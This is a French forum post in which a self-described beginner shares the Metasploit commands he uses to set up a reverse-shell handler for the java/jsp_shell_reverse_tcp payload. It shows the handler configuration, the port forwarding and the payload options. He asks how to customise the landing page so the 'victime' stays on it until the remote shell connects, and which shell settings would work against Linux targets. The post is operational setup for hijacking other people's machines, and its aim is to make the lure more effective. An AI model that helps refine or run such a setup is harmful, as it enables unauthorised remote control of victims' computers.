salut je teste le PAYLOAD java/jsp_shell_reverse_tcp (Metasploit Framework 3.3.3), j'ai quelque petite question de noob,
voilà comment je le configure:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcp
msf exploit(handler) > set LHOST mon_ip_local
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
( j'ai bien redirigé le port sur mon routeur )
lorsque que la "victime" se connecte à "mon_ip:4444/exploit"
j'ai bien des information qui s'affiche dans mon terminal, mais la "victime" ne reste pas sur la page puisqu'elle tombe sur une page blanche,
donc :[*] Command shell session 1 closed.
peut on personnalisé cette page ? pour forcé la victime à resté dessus le temps que la connexion se fasse ?
autre question:
Payload options (java/jsp_shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.10.10 yes The local address
LPORT 4444 yes The local port
SHELL cmd.exe yes The system shell to use.
quels sont les différentes options possible pour SHELL ?
pour visé une plateforme linux par exemple ? ( set SHELL gnome-terminal ? )
merci de votre aide. Z0rg-